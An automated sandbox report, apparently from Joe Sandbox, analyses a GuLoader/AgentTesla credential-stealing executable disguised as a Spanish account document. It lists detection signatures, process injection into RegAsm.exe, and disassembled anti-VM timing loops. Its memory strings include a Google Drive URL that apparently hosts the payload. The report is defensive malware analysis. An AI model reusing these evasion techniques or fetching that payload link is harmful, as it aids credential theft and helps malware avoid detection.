Loading ...

Play interactive tourEdit tour

Analysis Report GUEROLA INDUSTRIES N#U00ba de cuenta.exe

Overview

General Information

Sample Name:GUEROLA INDUSTRIES N#U00ba de cuenta.exe
Analysis ID:356269
MD5:9bca56d197da87e223e660316b3a48a0
SHA1:1950233071e9942921e9238bdf5c68c01182158c
SHA256:d30d1ebb4f2b3e74d4bef8630c51514337ce4f59fe393bc978534a5bdb06a1c2
Tags:ESPexegeoGuLoader

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected GuLoader
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • GUEROLA INDUSTRIES N#U00ba de cuenta.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe' MD5: 9BCA56D197DA87E223E660316B3A48A0)
    • RegAsm.exe (PID: 3296 cmdline: 'C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 5044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 3296JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 3296JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: GUEROLA INDUSTRIES N#U00ba de cuenta.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Uses secure TLS version for HTTPS connectionsShow sources
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS traffic detected: queries for: doc-14-9s-docs.googleusercontent.com
            Source: RegAsm.exe, 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpString found in binary or memory: http://MXXVzU.com
            Source: RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000008.00000002.908488503.00000000015E5000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O
            Source: RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
            Source: RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
            Source: RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
            Source: RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
            Source: RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
            Source: RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/d
            Source: RegAsm.exe, 00000008.00000002.908427204.000000000159F000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-9s-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-9s-docs.googleusercontent.com/U
            Source: RegAsm.exe, 00000008.00000002.908427204.000000000159F000.00000004.00000020.sdmp, RegAsm.exe, 00000008.00000002.908520125.00000000015FA000.00000004.00000020.sdmp, RegAsm.exe, 00000008.00000002.908488503.00000000015E5000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-9s-docs.googleusercontent.com/docs/securesc/5ncffemq1843clkn140nheko96l7akee/3e4j78eu
            Source: RegAsm.exe, 00000008.00000002.908427204.000000000159F000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/-
            Source: RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/nonceSigner?nonce=2faifmm8htnpk&continue=https://doc-14-9s-docs.googleuserco
            Source: RegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/p(
            Source: RegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/X(C
            Source: RegAsm.exeString found in binary or memory: https://drive.google.com/uc?export=download&id=1FAdfOdC9S1Rm2i8mXb_LPE-7X5DxuIBp
            Source: RegAsm.exe, 00000008.00000002.908466549.00000000015BD000.00000004.00000020.sdmpString found in binary or memory: https://pki.goog/repository/0
            Source: RegAsm.exe, 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0120548D NtProtectVirtualMemory,8_2_0120548D
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_00401E3C0_2_00401E3C
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_004018600_2_00401860
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_004018130_2_00401813
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_004016240_2_00401624
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1DB647A08_2_1DB647A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1DB647738_2_1DB64773
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1DB6477D8_2_1DB6477D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1DB6475D8_2_1DB6475D
            Source: GUEROLA INDUSTRIES N#U00ba de cuenta.exe, 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLONDRES.exe vs GUEROLA INDUSTRIES N#U00ba de cuenta.exe
            Source: GUEROLA INDUSTRIES N#U00ba de cuenta.exeBinary or memory string: OriginalFilenameLONDRES.exe vs GUEROLA INDUSTRIES N#U00ba de cuenta.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: GUEROLA INDUSTRIES N#U00ba de cuenta.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal88.troj.evad.winEXE@4/0@1/1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_01
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeFile created: C:\Users\user\AppData\Local\Temp\~DF8817D1ABED282CF3.TMPJump to behavior
            Source: GUEROLA INDUSTRIES N#U00ba de cuenta.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe 'C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3296, type: MEMORY
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_004066A0 pushfd ; iretd 0_2_00406733
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_00404345 push ss; ret 0_2_0040434B
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_0040414B pushad ; iretd 0_2_00404166
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_00405760 push ds; ret 0_2_0040576F
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_004091F9 push cs; ret 0_2_0040920C
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_00403FA1 push edx; iretd 0_2_00403FA2
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeCode function: 0_2_022543A5 push eax; retf 0_2_022543B2
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeRDTSC instruction interceptor: First address: 0000000002252701 second address: 0000000002252701 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F9C58D19D38h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F9C58D19D23h 0x00000026 push ecx 0x00000027 call 00007F9C58D19D5Ch 0x0000002c call 00007F9C58D19D48h 0x00000031 lfence 0x00000034 mov edx, dword ptr [7FFE0014h] 0x0000003a lfence 0x0000003d ret 0x0000003e mov esi, edx 0x00000040 pushad 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeRDTSC instruction interceptor: First address: 00000000022521C6 second address: 00000000022521C6 instructions:
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: RegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpBinary or memory string: ROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeRDTSC instruction interceptor: First address: 0000000002252701 second address: 0000000002252701 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F9C58D19D38h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F9C58D19D23h 0x00000026 push ecx 0x00000027 call 00007F9C58D19D5Ch 0x0000002c call 00007F9C58D19D48h 0x00000031 lfence 0x00000034 mov edx, dword ptr [7FFE0014h] 0x0000003a lfence 0x0000003d ret 0x0000003e mov esi, edx 0x00000040 pushad 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeRDTSC instruction interceptor: First address: 00000000022528CB second address: 00000000022528CB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F9C58D26F22h 0x0000001d popad 0x0000001e call 00007F9C58D24B91h 0x00000023 lfence 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeRDTSC instruction interceptor: First address: 00000000022521C6 second address: 00000000022521C6 instructions:
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 00000000012028CB second address: 00000000012028CB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F9C58D26F22h 0x0000001d popad 0x0000001e call 00007F9C58D24B91h 0x00000023 lfence 0x00000026 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01203B31 rdtsc 8_2_01203B31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1985Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7837Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6960Thread sleep time: -23058430092136925s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: RegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpBinary or memory string: rogram Files\Qemu-ga\qemu-ga.exe
            Source: RegAsm.exe, 00000008.00000002.908427204.000000000159F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 00000008.00000002.908256124.000000000154B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWh
            Source: RegAsm.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01203B31 rdtsc 8_2_01203B31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01204124 mov eax, dword ptr fs:[00000030h]8_2_01204124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01204962 mov eax, dword ptr fs:[00000030h]8_2_01204962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_012025A8 mov eax, dword ptr fs:[00000030h]8_2_012025A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0120505C mov eax, dword ptr fs:[00000030h]8_2_0120505C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1200000Jump to behavior
            Source: C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe' Jump to behavior
            Source: RegAsm.exe, 00000008.00000002.908708154.0000000001BD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
